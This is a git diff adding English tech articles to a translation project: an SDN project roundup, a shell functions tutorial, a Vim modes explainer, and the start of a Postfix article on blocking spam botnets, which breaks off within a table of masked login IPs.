free software, maths, kayaking, GitHub, Adventure Time, and Futurama. Follow Ben on Twitter @ben_nuttall. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/try-raspberry-pis-pixel-os-your-pc + +作者:[Ben Nuttall][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/bennuttall +[1]:https://twitter.com/ben_nuttall +[2]:https://twitter.com/intent/tweet?in_reply_to=811511740907261952 +[3]:https://twitter.com/intent/retweet?tweet_id=811511740907261952 +[4]:https://twitter.com/intent/like?tweet_id=811511740907261952 +[5]:https://twitter.com/ben_nuttall +[6]:https://twitter.com/ben_nuttall/status/811511740907261952 +[7]:https://twitter.com/search?q=place%3A3bc1b6cfd27ef7f6 +[8]:https://twitter.com/ben_nuttall/status/811511740907261952/photo/1 +[9]:https://twitter.com/ben_nuttall/status/811511740907261952/photo/1 +[10]:https://twitter.com/ben_nuttall/status/811511740907261952/photo/1 +[11]:https://twitter.com/ben_nuttall/status/811511740907261952/photo/1 +[12]:https://opensource.com/article/17/1/try-raspberry-pis-pixel-os-your-pc?rate=iqVrGV3EhwRuqh68sf6Zye6Y7VSpXRCUQoZV3sg-QJM +[13]:http://downloads.raspberrypi.org/pixel_x86/images/pixel_x86-2016-12-13/ +[14]:https://www.raspberrypi.org/magpi/issues/53/ +[15]:https://en.wikipedia.org/wiki/ARM_Holdings +[16]:http://gpiozero.readthedocs.io/ +[17]:http://www.allaboutcode.co.uk/single-post/2016/12/21/GPIOZero-Remote-GPIO-with-PIXEL-x86 +[18]:https://gist.github.com/bennuttall/572789b0aa5fc2e7c05c7ada1bdc813e +[19]:https://www.raspberrypi.org/magpi/issues/53/ +[20]:https://opensource.com/user/26767/feed +[21]:https://opensource.com/article/17/1/try-raspberry-pis-pixel-os-your-pc#comments +[22]:https://opensource.com/users/bennuttall diff --git a/sources/tech/20170207 5 Open Source Software Defined Networking Projects to Know.md b/sources/tech/20170207 5 Open Source Software Defined Networking Projects to Know.md new file mode 100644 index 0000000000..c7178c612c --- /dev/null +++ b/sources/tech/20170207 5 Open Source Software Defined Networking Projects to Know.md @@ -0,0 +1,67 @@ +5 Open Source Software Defined Networking Projects to Know +============================================================ + + + ![SDN](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/software-defined-networking_0.jpg?itok=FeWzZo8n "SDN") +SDN is beginning to redefine corporate networking; here are five open source projects you should know.[Creative Commons Zero][1]Pixabay + +Throughout 2016, Software Defined Networking (SDN) continued to rapidly evolve and gain maturity. We are now beyond the conceptual phase of open source networking, and the companies that were assessing the potential of these projects two years ago have begun enterprise deployments. As has been predicted for several years, SDN is beginning to redefine corporate networking. + +Market researchers are essentially unanimous on the topic. IDC published[ a study][3] of the SDN market earlier this year and predicted a 53.9 percent CAGR from 2014 through 2020, at which point the market will be valued at $12.5 billion. In addition, the Technology Trends 2016 report ranked SDN as the best technology investment for 2016. + +"Cloud computing and the 3rd Platform have driven the need for SDN, which will represent a market worth more than $12.5 billion in 2020\. Not surprisingly, the value of SDN will accrue increasingly to network-virtualization software and to SDN applications, including virtualized network and security services. Large enterprises are now realizing the value of SDN in the datacenter, but ultimately, they will also recognize its applicability across the WAN to branch offices and to the campus network," said[ Rohit Mehra][4], Vice President of Network Infrastructure at IDC. + +The Linux Foundation recently[ ][5]announced the release of its 2016 report[ "Guide to the Open Cloud: Current Trends and Open Source Projects."][6] This third annual report provides a comprehensive look at the state of open cloud computing, and includes a section on unikernels. You can[ download the report][7] now, and one of the first things to notice is that it aggregates and analyzes research, illustrating how trends in containers, unikernels, and more are reshaping cloud computing. The report provides descriptions and links to categorized projects central to today’s open cloud environment. + +In this series, we are looking at various categories and providing extra insight on how the areas are evolving. Below, you’ll find several important SDN projects and the impact that they are having, along with links to their GitHub repositories, all gathered from the Guide to the Open Cloud: + +### Software-Defined Networking + +[ONOS][8] + +Open Network Operating System (ONOS), a Linux Foundation project, is a software-defined networking OS for service providers that has scalability, high availability, high performance and abstractions to create apps and services. [ONOS on GitHub][9] + +[OpenContrail][10] + +OpenContrail is Juniper Networks’ open source network virtualization platform for the cloud. It provides all the necessary components for network virtualization: SDN controller, virtual router, analytics engine, and published northbound APIs. Its REST API configures and gathers operational and analytics data from the system. [OpenContrail on GitHub][11] + +[OpenDaylight][12] + +OpenDaylight, an OpenDaylight Foundation project at The Linux Foundation, is a programmable, software-defined networking platform for service providers and enterprises. Based on a microservices architecture, it enables network services across a spectrum of hardware in multivendor environments. [OpenDaylight on GitHub][13] + +[Open vSwitch][14] + +Open vSwitch, a Linux Foundation project, is a production-quality, multilayer virtual switch. It’s designed for massive network automation through programmatic extension, while still supporting standard management interfaces and protocols including NetFlow, sFlow, IPFIX, RSPAN, CLI, LACP, and 802.1ag. It supports distribution across multiple physical servers similar to VMware’s vNetwork distributed vswitch or Cisco’s Nexus 1000V. [OVS on GitHub][15] + +[OPNFV][16] + +Open Platform for Network Functions Virtualization (OPNFV), a Linux Foundation project, is a reference NFV platform for enterprise and service provider networks. It brings together upstream components across compute, storage and network virtualization in order create an end-to-end platform for NFV applications. [OPNFV on Bitergia][17] + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/open-cloud-report/2016/5-open-source-software-defined-networking-projects-know + +作者:[SAM DEAN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/sam-dean +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/software-defined-networkingjpg-0 +[3]:https://www.idc.com/getdoc.jsp?containerId=prUS41005016 +[4]:http://www.idc.com/getdoc.jsp?containerId=PRF003513 +[5]:https://www.linux.com/blog/linux-foundation-issues-2016-guide-open-source-cloud-projects +[6]:http://ctt.marketwire.com/?release=11G120876-001&id=10172077&type=0&url=http%3A%2F%2Fgo.linuxfoundation.org%2Frd-open-cloud-report-2016-pr +[7]:http://go.linuxfoundation.org/l/6342/2016-10-31/3krbjr +[8]:http://onosproject.org/ +[9]:https://github.com/opennetworkinglab/onos +[10]:http://www.opencontrail.org/ +[11]:https://github.com/Juniper/contrail-controller +[12]:https://www.opendaylight.org/ +[13]:https://github.com/opendaylight +[14]:http://openvswitch.org/ +[15]:https://github.com/openvswitch/ovs +[16]:https://www.opnfv.org/ +[17]:http://projects.bitergia.com/opnfv/browser/ diff --git a/sources/tech/20170207 How To Write and Use Custom Shell Functions and Libraries.md b/sources/tech/20170207 How To Write and Use Custom Shell Functions and Libraries.md new file mode 100644 index 0000000000..ec0b0677d6 --- /dev/null +++ b/sources/tech/20170207 How To Write and Use Custom Shell Functions and Libraries.md @@ -0,0 +1,157 @@ +wcnnbdk1 translating +How To Write and Use Custom Shell Functions and Libraries +============================================================ + +In Linux, shell scripts help us in so many different ways including performing or even [automating certain system administration tasks][1], creating simple command line tools and many more. + +In this guide, we will show new Linux users where to reliably store custom shell scripts, explain how to write custom shell functions and libraries, use functions from libraries in other scripts. + +### Where to Store Shell Scripts + +In order to run your scripts without typing a full/absolute path, they must be stored in one of the directories in the $PATH environment variable. + +To check your $PATH, issues the command below: + +``` +$ echo $PATH +/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games +``` + +Normally, if the directory bin exists in a users home directory, it is automatically included in his/her $PATH. You can store your shell scripts here. + +Therefore, create the bin directory (which may also store Perl, [Awk][2] or Python scripts or any other programs): + +``` +$ mkdir ~/bin +``` + +Next, create a directory called lib (short for libraries) where you’ll keep your own libraries. You can also keep libraries for other languages such as C, Python and so on, in it. Under it, create another directory called sh; this will particularly store you shell libraries: + +``` +$ mkdir -p ~/lib/sh +``` + +### Create Your Own Shell Functions and Libraries + +A shell function is a group of commands that perform a special task in a script. They work similarly to procedures, subroutines and functions in other programming languages. + +The syntax for writing a function is: + +``` +function_name() { list of commands } +``` + +For example, you can write a function in a script to show the date as follows: + +``` +showDATE() {date;} +``` + +Every time you want to display date, simply invoke the function above using its name: + +``` +$ showDATE +``` + +A shell library is simply a shell script, however, you can write a library to only store your functions that you can later call from other shell scripts. + +Below is an example of a library called libMYFUNCS.sh in my ~/lib/sh directory with more examples of functions: + +``` +#!/bin/bash +#Function to clearly list directories in PATH +showPATH() { +oldifs="$IFS" #store old internal field separator +IFS=: #specify a new internal field separator +for DIR in $PATH ; do echo $DIR ; done +IFS="$oldifs" #restore old internal field separator +} +#Function to show logged user +showUSERS() { +echo -e “Below are the user logged on the system:\n” +w +} +#Print a user’s details +printUSERDETS() { +oldifs="$IFS" #store old internal field separator +IFS=: #specify a new internal field separator +read -p "Enter user name to be searched:" uname #read username +echo "" +#read and store from a here string values into variables using : as a field delimiter +read -r username pass uid gid comments homedir shell <<< "$(cat /etc/passwd | grep "^$uname")" +#print out captured values +echo -e "Username is : $username\n" +echo -e "User's ID : $uid\n" +echo -e "User's GID : $gid\n" +echo -e "User's Comments : $comments\n" +echo -e "User's Home Dir : $homedir\n" +echo -e "User's Shell : $shell\n" +IFS="$oldifs" #store old internal field separator +} +``` + +Save the file and make the script executable. + +### How To Invoke Functions From a Library + +To use a function in a lib, you need to first of all include the lib in the shell script where the function will be used, in the form below: + +``` +$ ./path/to/lib +OR +$ source /path/to/lib +``` + +So you would use the function printUSERDETS from the lib ~/lib/sh/libMYFUNCS.sh in another script as shown below. + +You do not have to write another code in this script to print a particular user’s details, simply call an existing function. + +Open a new file with the name test.sh: + +``` +#!/bin/bash +#include lib +. ~/lib/sh/libMYFUNCS.sh +#use function from lib +printUSERDETS +#exit script +exit 0 +``` + +Save it, then make the script executable and run it: + +``` +$ chmod 755 test.sh +$ ./test.sh +``` +[ + ![Write Shell Functions](http://www.tecmint.com/wp-content/uploads/2017/02/Write-Shell-Functions.png) +][3] + +Write Shell Functions + +In this article, we showed you where to reliably store shell scripts, how to write your own shell functions and libraries, invoke functions from libraries in normal shell scripts. + +Next, we will explain a straight forward way of configuring Vim as an IDE for Bash scripting. Until then, always stay connected to TecMint and also share your thoughts about this guide via the feedback form below. + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/write-custom-shell-functions-and-libraries-in-linux/ + +作者:[Aaron Kili][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/using-shell-script-to-automate-linux-system-maintenance-tasks/ +[2]:http://www.tecmint.com/use-linux-awk-command-to-filter-text-string-in-files/ +[3]:http://www.tecmint.com/wp-content/uploads/2017/02/Write-Shell-Functions.png diff --git a/sources/tech/20170207 Vim Editor Modes Explained.md b/sources/tech/20170207 Vim Editor Modes Explained.md new file mode 100644 index 0000000000..9f292c6ec4 --- /dev/null +++ b/sources/tech/20170207 Vim Editor Modes Explained.md @@ -0,0 +1,118 @@ +Vim Editor Modes Explained +#ch-cn translating +============================================================ + +### On this page + +1. [System and local vimrc][1] +2. [What compatibility are we talking][2] +3. [How to enable/disable these modes?][3] +4. [Other useful details][4] + +So far, in our tutorials centered around [Vim][5], we discussed the editor's Modeline feature as well as how Vim's feature-set can be expanded using [plugins][6]. However, as we all know, Vim offers a plethora of in-built features; so taking the discussion further, in this tutorial, we will discuss the available modes in which the editor can be launched. + +But before we do that, please note that all the examples, commands, and instructions mentioned in this tutorial have been tested on Ubuntu 14.04, and the Vim version we've used is 7.4. + +# Compatible and Nocompatible modes in Vim + +To properly understand the aforementioned Vim modes, you'll first have to understand an important aspect of the editor's initialization process. + +### System and local vimrc + +The aspect in question is: when Vim is launched, a system-level 'vimrc' file is searched by the editor to carry out system-wide default initializations. + +This file is usually located at the **$VIM/vimrc** path on your system, but if that's not the case, then you can find the exact location by running the **:version** command inside Vim. For example, in my case, here's the relevant excerpt of the output the command produced: + +``` +... +... +... +system vimrc file: "$VIM/vimrc" +user vimrc file: "$HOME/.vimrc" +2nd user vimrc file: "~/.vim/vimrc" +user exrc file: "$HOME/.exrc" +fall-back for $VIM: "/usr/share/vim" +... +... +... +``` + +So the system 'vimrc' file is indeed located at **$VIM/vimrc**, but I checked that the $VIM environment variable isn't set on my machine. So in that case - as you can see in the output above - there's a fall back value for $VIM, which in my case is **/usr/share/vim**. When I tried searching for 'vimrc' at this path, I observed the file is present. So that's my system vimrc, which - as I mentioned earlier - is read when Vim is launched. + +After this system vimrc is parsed, the editor looks for a user-specific (or local) 'vimrc' file. The [order of search][7] for the local vimrc is: environment variable VIMINIT, $HOME/.vimrc, environment variable EXINIT, and a file named 'exrc'. Usually, it's the $HOME/.vimrc or ~/.vimrc that exists and is treated as local vimrc. + +### What compatibility are we talking + +As we're discussing Vim's compatible and nocompatible modes, it's worth knowing what kind of compatibility does these modes enable and disable. For this, one should first be aware that Vim is a short form of **V**i **IM**proved, and as the full name suggests, the editor is an improved version of the Vi editor. + +By improved, what is meant is that the feature set that Vim offers is larger than that of Vi. For a better understanding of difference between the two editors, head [here][8]. + +So while discussing Vim's compatible and nocompatible modes, the compatibility we're talking about is Vim's compatibility with Vi. When run in compatible mode, most of the enhancements and improvements of Vim get disabled. However, keep in mind that in this mode, Vim doesn't simply emulate Vi - the mode basically sets some default options to the way the Vi editor works. + +The nocompatible mode - needless to say - makes Vim work without being Vi-compatible, making it all its enhancements/improvements/features available to the user. + +### How to enable/disable these modes? + +Try running the **:help compatible** command in Vim, and you should see the following syntax: + +``` +'compatible' 'cp' boolean (default on, off when a |vimrc| or |gvimrc| + file is found) +``` + +So the description says the compatible mode is ON by default, but gets turned OFF when a vimrc file is found. But which vimrc are we talking about? The answer is local vimrc. Delve into the details that the **:help compatible** command offers and you'll find the following line, which should make things more clear: + +``` +Effectively, this means that when a |vimrc| or |gvimrc| file exists, Vim will use the Vim defaults,otherwise it will use the Vi defaults. (Note: This doesn't happen for the system-wide vimrc or gvimrc file, nor for a file given with the |-u| argument). +``` + +So, what actually happens is, whenever Vim is launched, it first parses the system vimrc file - at this time the compatible mode is ON by default. Now, whenever a user (or local) vimrc is found, the nocompatible mode gets turned on. The **:help compatible-default** command makes it quite clear: + +``` +When Vim starts, the 'compatible' option is on. This will be used when Vim starts its initializations. But as soon as a user vimrc file is found, or a vimrc file in the current directory, or the "VIMINIT" environment variable is set, it will be set to 'nocompatible'. +``` + +In case you want to override the default behavior, and turn on the nocompatible mode when the editor starts parsing the system vimrc file, this can be done by adding the following command to that file in the beginning: + +``` +:set nocompatible +``` + +### Other useful details + +Here are some more useful details about these modes: + +``` +But there is a side effect of setting or resetting 'compatible' at the moment a .vimrc file is found: Mappings are interpreted the moment they are encountered. This makes a difference when using things like "". If the mappings depend on a certain value of 'compatible', set or reset it before +giving the mapping. + +The above behavior can be overridden in these ways: +- If the "-N" command line argument is given, 'nocompatible' will be used, even when no vimrc file exists. +- If the "-C" command line argument is given, 'compatible' will be used, even when a vimrc file exists. +- If the "-u {vimrc}" argument is used, 'compatible' will be used. +- When the name of the executable ends in "ex", then this works like the "-C" argument was given: 'compatible' will be used, even when a vimrc file exists. This has been done to make Vim behave like "ex", when it is started as "ex". +``` + +# Conclusion + +Agreed, chances are that you may not find yourself in a situation where-in you'll have turn on the Vi-compatible mode of Vim, but that doesn't mean you should be ignorant of the editor's initialization process. After all, you never know when this knowledge might be of your help. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/vim-editor-modes-explained/ + +作者:[Himanshu Arora][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/vim-editor-modes-explained/ +[1]:https://www.howtoforge.com/tutorial/vim-editor-modes-explained/#system-and-local-vimrc +[2]:https://www.howtoforge.com/tutorial/vim-editor-modes-explained/#what-compatibility-are-we-talking +[3]:https://www.howtoforge.com/tutorial/vim-editor-modes-explained/#how-to-enabledisable-these-modes +[4]:https://www.howtoforge.com/tutorial/vim-editor-modes-explained/#other-useful-details +[5]:https://www.howtoforge.com/vim-basics +[6]:https://www.howtoforge.com/tutorial/vim-editor-plugins-for-software-developers-3/ +[7]:http://vimdoc.sourceforge.net/htmldoc/starting.html#system-vimrc +[8]:http://askubuntu.com/questions/418396/what-is-the-difference-between-vi-and-vim diff --git a/sources/tech/20170208 Blocking of international spam botnets with a Postfix plugin.md b/sources/tech/20170208 Blocking of international spam botnets with a Postfix plugin.md new file mode 100644 index 0000000000..068861cbe1 --- /dev/null +++ b/sources/tech/20170208 Blocking of international spam botnets with a Postfix plugin.md @@ -0,0 +1,544 @@ +Blocking of international spam botnets with a Postfix plugin +============================================================ + +### On this page + +1. [Introduction][1] +2. [How international botnet works][2] +3. [Defending against botnet spammers][3] +4. [Installation][4] + +This article contains an analysis and solution for blocking of international SPAM botnets and a tutorial to install the anti-spam plugin to postfix firewall - postfwd in the postfix MTA. + +### Introduction + +One of the most important and hardest tasks for every company that provides mail services is staying out of the mail blacklists. + +If a mail domain appears in one of the mail domain blacklists, other mail servers will stop accepting and relaying its e-mails. This will practically ban the domain from the majority of mail providers and prohibits that the provider’s customers can send e-mails. Tere is only one thing that a mail provider can do afterwards: ask the blacklist providers for removal from the list or change the IP addresses and domain names of its mail servers. + +Getting into mail blacklist is very easy when a mail provider does not have a protection against spammers. Only one compromised customer mail account from which a hacker will start sending spam is needed to appear in a blacklist. + +There are several ways of how hackers send spam from compromised mail accounts. In this article, I would like to show you how to completely mitigate international botnet spammers, who are characterized by logging into mail accounts from multiple IP addresses located in multiple countries worldwide. + +### How international botnet works + +Hackers who use an international botnet for spamming operate very efficient and are not easy to track. I started to analyze the behaviour of such an international spam botnet in October of 2016 and implemented a plugin for **postfix firewall** - **postfwd**, which intelligently bans all spammers from international botnets. + +The first step was the analysis of the behavior of an international spam botnet done by tracking of one compromised mail account. I created a simple bash one-liner to select sasl login IP addresses of the compromised mail account from the postfwd login mail logs. + +**Data in the following table are dumped 90 minutes after compromisation of one mail account and contains these attributes:** + +* IP addresses from which hacker logged into account (ip_address) +* Corresponding country codes of IP addresses from GeoIP database (state_code) +* Number of sasl logins which hacker did from one IP address (login_count) + +``` + +-----------------+------------+-------------+ + | ip_address | state_code | login_count | + +-----------------+------------+-------------+ + | 41.63.176.___ | AO | 8 | + | 200.80.227.___ | AR | 41 | + | 120.146.134.___ | AU | 18 | + | 79.132.239.___ | BE | 15 | + | 184.149.27.___ | CA | 1 | + | 24.37.20.___ | CA | 13 | + | 70.28.77.___ | CA | 21 | + | 70.25.65.___ | CA | 23 | + | 72.38.177.___ | CA | 24 | + | 174.114.121.___ | CA | 27 | + | 206.248.139.___ | CA | 4 | + | 64.179.221.___ | CA | 4 | + | 184.151.178.___ | CA | 40 | + | 24.37.22.___ | CA | 51 | + | 209.250.146.___ | CA | 66 | + | 209.197.185.___ | CA | 8 | + | 47.48.223.___ | CA | 8 | + | 70.25.41.___ | CA | 81 | + | 184.71.9.___ | CA | 92 | + | 84.226.27.___ | CH | 5 | + | 59.37.9.___ | CN | 6 | + | 181.143.131.___ | CO | 24 | + | 186.64.177.___ | CR | 6 | + | 77.104.244.___ | CZ | 1 | + | 78.108.109.___ | CZ | 18 | + | 185.19.1.___ | CZ | 58 | + | 95.208.250.___ | DE | 1 | + | 79.215.89.___ | DE | 15 | + | 47.71.223.___ | DE | 23 | + | 31.18.251.___ | DE | 27 | + | 2.164.183.___ | DE | 32 | + | 79.239.97.___ | DE | 32 | + | 80.187.103.___ | DE | 54 | + | 109.84.1.___ | DE | 6 | + | 212.97.234.___ | DK | 49 | + | 190.131.134.___ | EC | 42 | + | 84.77.172.___ | ES | 1 | + | 91.117.105.___ | ES | 10 | + | 185.87.99.___ | ES | 14 | + | 95.16.51.___ | ES | 15 | + | 95.127.182.___ | ES | 16 | + | 195.77.90.___ | ES | 19 | + | 188.86.18.___ | ES | 2 | + | 212.145.210.___ | ES | 38 | + | 148.3.169.___ | ES | 39 | + | 95.16.35.___ | ES | 4 | + | 81.202.61.___ | ES | 45 | + | 88.7.246.___ | ES | 7 | + | 81.36.5.___ | ES | 8 | + | 88.14.192.___ | ES | 8 | + | 212.97.161.___ | ES | 9 | + | 193.248.156.___ | FR | 5 | + | 82.34.32.___ | GB | 1 | + | 86.180.214.___ | GB | 11 | + | 81.108.174.___ | GB | 12 | + | 86.11.209.___ | GB | 13 | + | 86.150.224.___ | GB | 15 | + | 2.102.31.___ | GB | 17 | + | 93.152.88.___ | GB | 18 | + | 86.178.68.___ | GB | 19 | + | 176.248.121.___ | GB | 2 | + | 2.97.227.___ | GB | 2 | + | 62.49.34.___ | GB | 2 | + | 79.64.78.___ | GB | 20 | + | 2.126.140.___ | GB | 22 | + | 87.114.222.___ | GB | 23 | + | 188.29.164.___ | GB | 24 | + | 82.11.14.___ | GB | 26 | + | 81.168.46.___ | GB | 29 | + | 86.136.125.___ | GB | 3 | + | 90.199.85.___ | GB | 3 | + | 86.177.93.___ | GB | 31 | + | 82.32.186.___ | GB | 4 | + | 79.68.153.___ | GB | 46 | + | 151.226.42.___ | GB | 6 | + | 2.123.234.___ | GB | 6 | + | 90.217.211.___ | GB | 6 | + | 212.159.148.___ | GB | 68 | + | 88.111.94.___ | GB | 7 | + | 77.98.186.___ | GB | 9 | + | 41.222.232.___ | GH | 4 | + | 176.63.29.___ | HU | 30 | + | 86.47.237.___ | IE | 10 | + | 37.46.22.___ | IE | 4 | + | 95.83.249.___ | IE | 4 | + | 109.79.69.___ | IE | 6 | + | 79.176.100.___ | IL | 13 | + | 122.175.34.___ | IN | 19 | + | 114.143.5.___ | IN | 26 | + | 115.112.159.___ | IN | 4 | + | 79.62.179.___ | IT | 11 | + | 79.53.217.___ | IT | 19 | + | 188.216.54.___ | IT | 2 | + | 46.44.203.___ | IT | 2 | + | 80.86.57.___ | IT | 2 | + | 5.170.192.___ | IT | 27 | + | 80.23.42.___ | IT | 3 | + | 89.249.177.___ | IT | 3 | + | 93.39.141.___ | IT | 31 | + | 80.183.6.___ | IT | 34 | + | 79.25.107.___ | IT | 35 | + | 81.208.25.___ | IT | 39 | + | 151.57.154.___ | IT | 4 | + | 79.60.239.___ | IT | 42 | + | 79.47.25.___ | IT | 5 | + | 188.216.114.___ | IT | 7 | + | 151.31.139.___ | IT | 8 | + | 46.185.139.___ | JO | 9 | + | 211.180.177.___ | KR | 22 | + | 31.214.125.___ | KW | 2 | + | 89.203.17.___ | KW | 3 | + | 94.187.138.___ | KW | 4 | + | 209.59.110.___ | LC | 18 | + | 41.137.40.___ | MA | 12 | + | 189.211.204.___ | MX | 5 | + | 89.98.64.___ | NL | 6 | + | 195.241.8.___ | NL | 9 | + | 195.1.82.___ | NO | 70 | + | 200.46.9.___ | PA | 30 | + | 111.125.66.___ | PH | 1 | + | 89.174.81.___ | PL | 7 | + | 64.89.12.___ | PR | 24 | + | 82.154.194.___ | PT | 12 | + | 188.48.145.___ | SA | 8 | + | 42.61.41.___ | SG | 25 | + | 87.197.112.___ | SK | 3 | + | 116.58.231.___ | TH | 4 | + | 195.162.90.___ | UA | 5 | + | 108.185.167.___ | US | 1 | + | 108.241.56.___ | US | 1 | + | 198.24.64.___ | US | 1 | + | 199.249.233.___ | US | 1 | + | 204.8.13.___ | US | 1 | + | 206.81.195.___ | US | 1 | + | 208.75.20.___ | US | 1 | + | 24.149.8.___ | US | 1 | + | 24.178.7.___ | US | 1 | + | 38.132.41.___ | US | 1 | + | 63.233.138.___ | US | 1 | + | 68.15.198.___ | US | 1 | + | 72.26.57.___ | US | 1 | + | 72.43.167.___ | US | 1 | + | 74.65.154.___ | US | 1 | + | 74.94.193.___ | US | 1 | + | 75.150.97.___ | US | 1 | + | 96.84.51.___ | US | 1 | + | 96.90.244.___ | US | 1 | + | 98.190.153.___ | US | 1 | + | 12.23.72.___ | US | 10 | + | 50.225.58.___ | US | 10 | + | 64.140.101.___ | US | 10 | + | 66.185.229.___ | US | 10 | + | 70.63.88.___ | US | 10 | + | 96.84.148.___ | US | 10 | + | 107.178.12.___ | US | 11 | + | 170.253.182.___ | US | 11 | + | 206.127.77.___ | US | 11 | + | 216.27.83.___ | US | 11 | + | 72.196.170.___ | US | 11 | + | 74.93.168.___ | US | 11 | + | 108.60.97.___ | US | 12 | + | 205.196.77.___ | US | 12 | + | 63.159.160.___ | US | 12 | + | 204.93.122.___ | US | 13 | + | 206.169.117.___ | US | 13 | + | 208.104.106.___ | US | 13 | + | 65.28.31.___ | US | 13 | + | 66.119.110.___ | US | 13 | + | 67.84.164.___ | US | 13 | + | 69.178.166.___ | US | 13 | + | 71.232.229.___ | US | 13 | + | 96.3.6.___ | US | 13 | + | 205.214.233.___ | US | 14 | + | 38.96.46.___ | US | 14 | + | 67.61.214.___ | US | 14 | + | 173.233.58.___ | US | 141 | + | 64.251.53.___ | US | 15 | + | 73.163.215.___ | US | 15 | + | 24.61.176.___ | US | 16 | + | 67.10.184.___ | US | 16 | + | 173.14.42.___ | US | 17 | + | 173.163.34.___ | US | 17 | + | 104.138.114.___ | US | 18 | + | 23.24.168.___ | US | 18 | + | 50.202.9.___ | US | 19 | + | 96.248.123.___ | US | 19 | + | 98.191.183.___ | US | 19 | + | 108.215.204.___ | US | 2 | + | 50.198.37.___ | US | 2 | + | 69.178.183.___ | US | 2 | + | 74.190.39.___ | US | 2 | + | 76.90.131.___ | US | 2 | + | 96.38.10.___ | US | 2 | + | 96.60.117.___ | US | 2 | + | 96.93.6.___ | US | 2 | + | 74.69.197.___ | US | 21 | + | 98.140.180.___ | US | 21 | + | 50.252.0.___ | US | 22 | + | 69.71.200.___ | US | 22 | + | 71.46.59.___ | US | 22 | + | 74.7.35.___ | US | 22 | + | 12.191.73.___ | US | 23 | + | 208.123.156.___ | US | 23 | + | 65.190.29.___ | US | 23 | + | 67.136.192.___ | US | 23 | + | 70.63.216.___ | US | 23 | + | 96.66.144.___ | US | 23 | + | 173.167.128.___ | US | 24 | + | 64.183.78.___ | US | 24 | + | 68.44.33.___ | US | 24 | + | 23.25.9.___ | US | 25 | + | 24.100.92.___ | US | 25 | + | 107.185.110.___ | US | 26 | + | 208.118.179.___ | US | 26 | + | 216.133.120.___ | US | 26 | + | 75.182.97.___ | US | 26 | + | 107.167.202.___ | US | 27 | + | 66.85.239.___ | US | 27 | + | 71.122.125.___ | US | 28 | + | 74.218.169.___ | US | 28 | + | 76.177.204.___ | US | 28 | + | 216.165.241.___ | US | 29 | + | 24.178.50.___ | US | 29 | + | 63.149.147.___ | US | 29 | + | 174.66.84.___ | US | 3 | + | 184.183.156.___ | US | 3 | + | 50.233.39.___ | US | 3 | + | 70.183.165.___ | US | 3 | + | 71.178.212.___ | US | 3 | + | 72.175.83.___ | US | 3 | + | 74.142.22.___ | US | 3 | + | 98.174.50.___ | US | 3 | + | 98.251.168.___ | US | 3 | + | 206.74.148.___ | US | 30 | + | 24.131.201.___ | US | 30 | + | 50.80.199.___ | US | 30 | + | 69.251.49.___ | US | 30 | + | 108.6.53.___ | US | 31 | + | 74.84.229.___ | US | 31 | + | 172.250.78.___ | US | 32 | + | 173.14.75.___ | US | 32 | + | 216.201.55.___ | US | 33 | + | 40.130.243.___ | US | 33 | + | 164.58.163.___ | US | 34 | + | 70.182.187.___ | US | 35 | + | 184.170.168.___ | US | 37 | + | 198.46.110.___ | US | 37 | + | 24.166.234.___ | US | 37 | + | 65.34.19.___ | US | 37 | + | 75.146.12.___ | US | 37 | + | 107.199.135.___ | US | 38 | + | 206.193.215.___ | US | 38 | + | 50.254.150.___ | US | 38 | + | 69.54.48.___ | US | 38 | + | 172.8.30.___ | US | 4 | + | 24.106.124.___ | US | 4 | + | 65.127.169.___ | US | 4 | + | 71.227.65.___ | US | 4 | + | 71.58.72.___ | US | 4 | + | 74.9.236.___ | US | 4 | + | 12.166.108.___ | US | 40 | + | 174.47.56.___ | US | 40 | + | 66.76.176.___ | US | 40 | + | 76.111.90.___ | US | 41 | + | 96.10.70.___ | US | 41 | + | 97.79.226.___ | US | 41 | + | 174.79.117.___ | US | 42 | + | 70.138.178.___ | US | 42 | + | 64.233.225.___ | US | 43 | + | 97.89.203.___ | US | 43 | + | 12.28.231.___ | US | 44 | + | 64.235.157.___ | US | 45 | + | 76.110.237.___ | US | 45 | + | 71.196.10.___ | US | 46 | + | 173.167.177.___ | US | 49 | + | 24.7.92.___ | US | 49 | + | 68.187.225.___ | US | 49 | + | 184.75.77.___ | US | 5 | + | 208.91.186.___ | US | 5 | + | 71.11.113.___ | US | 5 | + | 75.151.112.___ | US | 5 | + | 98.189.112.___ | US | 5 | + | 69.170.187.___ | US | 51 | + | 97.64.182.___ | US | 51 | + | 24.239.92.___ | US | 52 | + | 72.211.28.___ | US | 53 | + | 66.179.44.___ | US | 54 | + | 66.188.47.___ | US | 55 | + | 64.60.22.___ | US | 56 | + | 73.1.95.___ | US | 56 | + | 75.140.143.___ | US | 58 | + | 24.199.140.___ | US | 59 | + | 216.240.53.___ | US | 6 | + | 216.26.16.___ | US | 6 | + | 50.242.1.___ | US | 6 | + | 65.83.137.___ | US | 6 | + | 68.119.102.___ | US | 6 | + | 68.170.224.___ | US 